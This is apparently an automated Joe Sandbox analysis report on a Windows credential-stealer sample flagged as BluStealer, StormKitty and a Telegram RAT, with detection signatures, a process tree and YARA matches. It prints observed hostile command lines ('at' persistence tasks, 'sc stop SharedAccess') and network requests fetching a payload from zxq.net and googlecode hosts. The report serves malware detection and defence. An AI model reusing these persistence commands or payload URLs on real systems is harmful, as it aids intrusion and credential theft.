Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Lg3gn9y1Cj.exe

Overview

General Information

Sample Name:Lg3gn9y1Cj.exe
Analysis ID:679096
MD5:45061e4da841c2587d0890148705a142
SHA1:eb68218c1d70f3ba00f8190c8171ad1cfa2fb42a
SHA256:6731f235ff78e22e5a0f1503542926bb707a95251b8cbd22c56fbd7fc5a8cbbf
Tags:exeMassLogger
Infos:

Detection

CryptOne, BluStealer, StormKitty
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Potential malicious icon found
Yara detected BluStealer
System process connects to network (likely due to code injection or exploit)
Detected CryptOne packer
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Antivirus / Scanner detection for submitted sample
Yara detected StormKitty Stealer
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
PE file has a writeable .text section
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Changes security center settings (notifications, updates, antivirus, firewall)
Yara detected Generic Downloader
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Installs a global mouse hook
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • Lg3gn9y1Cj.exe (PID: 5744 cmdline: "C:\Users\user\Desktop\Lg3gn9y1Cj.exe" MD5: 45061E4DA841C2587D0890148705A142)
    • lg3gn9y1cj.exe (PID: 4392 cmdline: c:\users\user\desktop\lg3gn9y1cj.exe MD5: BEE47439C4960E2728594ECE9AD95BA7)
      • AppLaunch.exe (PID: 5840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
    • icsys.icn.exe (PID: 5032 cmdline: C:\Users\user\AppData\Local\icsys.icn.exe MD5: 4223968DA579570E05813854A134397B)
      • explorer.exe (PID: 5300 cmdline: c:\windows\system\explorer.exe MD5: A6F18E47BFFD6F5C4AA28B67644DBDBE)
        • spoolsv.exe (PID: 6024 cmdline: c:\windows\system\spoolsv.exe SE MD5: 3BA9E53239D4DCA948B4BFCBB08D7F34)
          • svchost.exe (PID: 244 cmdline: c:\windows\system\svchost.exe MD5: B61A3DA9B4DB4644497B9CC1BE87515F)
            • spoolsv.exe (PID: 404 cmdline: c:\windows\system\spoolsv.exe PR MD5: 3BA9E53239D4DCA948B4BFCBB08D7F34)
            • at.exe (PID: 5656 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1016 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5128 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1520 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1756 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 1100 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5160 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6060 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 4316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5868 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6112 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 2872 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5200 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5064 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 5140 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 3816 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6172 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • at.exe (PID: 6384 cmdline: at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe MD5: 6E495479C0213E98C8141C75807AADC9)
              • conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • sc.exe (PID: 6400 cmdline: sc stop SharedAccess MD5: 24A3E2603E63BCB9695A2935D3B24695)
              • conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • sc.exe (PID: 6416 cmdline: sc config Schedule start= auto MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • svchost.exe (PID: 2960 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2236 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5184 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3032 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2956 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • explorer.exe (PID: 1564 cmdline: "C:\windows\system\explorer.exe" RO MD5: A6F18E47BFFD6F5C4AA28B67644DBDBE)
  • svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5484 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5008 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6308 cmdline: "C:\windows\system\svchost.exe" RO MD5: B61A3DA9B4DB4644497B9CC1BE87515F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Lg3gn9y1Cj.exeMALWARE_Win_A310LoggerDetects A310LoggerditekSHen
  • 0x5c44e:$s1: Temporary Directory * for
  • 0x5c4aa:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x5bf2e:$s6: Content-Disposition: form-data; name="document"; filename="
  • 0x5c3ce:$s7: CopyHere
  • 0x5c396:$s9: shell.application
  • 0x5c3fa:$s9: Shell.Application
  • 0x5c08e:$s10: SetRequestHeader
  • 0x5c55a:$s12: @TITLE Removing
  • 0x5c592:$s13: @RD /S /Q "
  • 0x9db8:$v1_2: AddAttachment

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\lg3gn9y1cj.exe MALWARE_Win_A310LoggerDetects A310LoggerditekSHen
  • 0x17b14:$s1: Temporary Directory * for
  • 0x17b70:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
  • 0x175f4:$s6: Content-Disposition: form-data; name="document"; filename="
  • 0x17a94:$s7: CopyHere
  • 0x17a5c:$s9: shell.application
  • 0x17ac0:$s9: Shell.Application
  • 0x17754:$s10: SetRequestHeader
  • 0x17c20:$s12: @TITLE Removing
  • 0x17c58:$s13: @RD /S /Q "

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmpQuasar_RAT_1Detects Quasar RATFlorian Roth
  • 0x327c:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x316c:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x3c02:$op3: 00 04 03 69 91 1B 40
  • 0x4452:$op3: 00 04 03 69 91 1B 40
00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
      00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.277724010.000000000733B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.0.lg3gn9y1cj.exe .400000.0.unpackMALWARE_Win_A310LoggerDetects A310LoggerditekSHen
          • 0x17b14:$s1: Temporary Directory * for
          • 0x17b70:$s2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\*RD_
          • 0x175f4:$s6: Content-Disposition: form-data; name="document"; filename="
          • 0x17a94:$s7: CopyHere
          • 0x17a5c:$s9: shell.application
          • 0x17ac0:$s9: Shell.Application
          • 0x17754:$s10: SetRequestHeader
          • 0x17c20:$s12: @TITLE Removing
          • 0x17c58:$s13: @RD /S /Q "
          1.2.lg3gn9y1cj.exe .2b40000.1.unpackQuasar_RAT_1Detects Quasar RATFlorian Roth
          • 0x347c:$op1: 04 1E FE 02 04 16 FE 01 60
          • 0x336c:$op2: 00 17 03 1F 20 17 19 15 28
          • 0x3e02:$op3: 00 04 03 69 91 1B 40
          • 0x4652:$op3: 00 04 03 69 91 1B 40
          1.2.lg3gn9y1cj.exe .2b40000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            1.2.lg3gn9y1cj.exe .2b40000.1.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              1.2.lg3gn9y1cj.exe .2b40000.1.unpackJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                Click to see the 11 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\icsys.icn.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Avira: detection malicious, Label: TR/Dropper.Gen
                Source: C:\Windows\System\svchost.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Windows\System\spoolsv.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Users\user\AppData\Roaming\mrsys.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Windows\System\explorer.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                Source: C:\Users\user\AppData\Local\stsys.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                Multi AV Scanner detection for submitted file
                Source: Lg3gn9y1Cj.exeVirustotal: Detection: 87%Perma Link
                Source: Lg3gn9y1Cj.exeReversingLabs: Detection: 100%
                Antivirus / Scanner detection for submitted sample
                Source: Lg3gn9y1Cj.exeAvira: detected
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Metadefender: Detection: 25%Perma Link
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe ReversingLabs: Detection: 92%
                Machine Learning detection for sample
                Source: Lg3gn9y1Cj.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\icsys.icn.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\lg3gn9y1cj.exe Joe Sandbox ML: detected
                Source: C:\Windows\System\svchost.exeJoe Sandbox ML: detected
                Source: C:\Windows\System\spoolsv.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\mrsys.exeJoe Sandbox ML: detected
                Source: C:\Windows\System\explorer.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\stsys.exeJoe Sandbox ML: detected
                Source: 9.0.spoolsv.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 52.2.svchost.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 1.0.lg3gn9y1cj.exe .400000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 9.2.spoolsv.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 1.2.lg3gn9y1cj.exe .400000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 7.2.spoolsv.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 34.2.explorer.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 4.0.icsys.icn.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 4.2.icsys.icn.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 0.2.Lg3gn9y1Cj.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 52.0.svchost.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 5.2.explorer.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 5.0.explorer.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 8.2.svchost.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 0.0.Lg3gn9y1Cj.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 34.0.explorer.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 8.0.svchost.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 7.0.spoolsv.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: Lg3gn9y1Cj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdb source: lg3gn9y1cj.exe , lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20220805_070938_705.etl.45.dr
                Source: Binary string: C:\Users\KINGDOM\Documents\New Builder\Linq4you\Linq4you\obj\x86\Release\Linq4me.pdbDO source: lg3gn9y1cj.exe , 00000001.00000002.535235845.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, lg3gn9y1cj.exe , 00000001.00000003.266417604.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000000.265995360.0000000005322000.00000040.00000400.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_00417143
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_00416130
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_004171D7
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_004179F2
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_00417190
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_0041725A
                Source: C:\Users\user\Desktop\Lg3gn9y1Cj.exeCode function: 4x nop then push ebp0_2_004172E5

                Networking

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System\explorer.exeDomain query: vccmd01.googlecode.com
                Source: C:\Windows\System\explorer.exeDomain query: vccmd02.googlecode.com
                Source: C:\Windows\System\explorer.exeNetwork Connect: 51.81.194.202 443Jump to behavior
                Source: C:\Windows\System\explorer.exeDomain query: zxq.net
                Source: C:\Windows\System\explorer.exeDomain query: vccmd01.zxq.net
                Source: C:\Windows\System\explorer.exeDomain query: vccmd03.googlecode.com
                Source: C:\Windows\System\explorer.exeDomain query: vccmd01.t35.com
                Source: C:\Windows\System\explorer.exeNetwork Connect: 142.250.145.82 80Jump to behavior
                May check the online IP address of the machine
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDNS query: name: icanhazip.com
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDNS query: name: icanhazip.com
                Yara detected Generic Downloader
                Source: Yara matchFile source: 1.2.lg3gn9y1cj.exe .2b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.AppLaunch.exe.5320000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewJA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /what-happened-to-the-old-zxq-website/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: zxq.net
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd02.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd03.googlecode.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.zxq.netConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/cmsys.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: vccmd01.googlecode.comConnection: Keep-Alive
